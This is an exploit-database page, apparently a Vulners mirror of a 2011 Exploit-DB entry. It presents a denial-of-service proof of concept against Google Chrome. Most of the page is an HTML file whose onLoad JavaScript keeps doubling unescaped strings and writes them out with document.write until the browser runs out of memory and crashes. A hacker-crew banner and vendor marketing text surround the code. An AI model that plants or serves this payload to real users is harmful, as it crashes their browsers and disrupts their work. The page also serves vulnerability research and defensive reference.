Lucene search
+L

Google Chrome - Denial of Service

🗓️ 23 Oct 2011 00:00:00Reported by Prashant UniyalType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Google Chrome Denial of Service vulnerability. Exploit code included

Code
/*

         GGGGGG\
	GG  __GG\
	GG /  \__| aaaaaa\   rrrrrr\  aaaaaa\   gggggg\   eeeeee\
	GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
	GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
	GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
	\GGGGGG  |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\
 	 \______/  \_______|\__|      \_______| \____gg | \_______|
                                       	       gg\   gg |
                                       		gggggg  |

Info-sec forum: http://garage4hackers.com

[+] Google Chrome Denial Of Service (DoS)

[+] Author: Prashant a.k.a t3rm!n4t0r

[+] C0ntact: [email protected]

[+] Platform: Windows, *nix

[+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

[+] Special Greets to: "vinnu" and secfence team

[+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r

                      all hackers garage crew :)


*/


<html>
<title>DoS</title>
<head>
<script>
function Lox()
 {

    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");

    for(i=0; i <= 100 ; ++i)
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="Lox()">
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2011 00:00Current
5.3Medium risk
Vulners AI Score5.3
38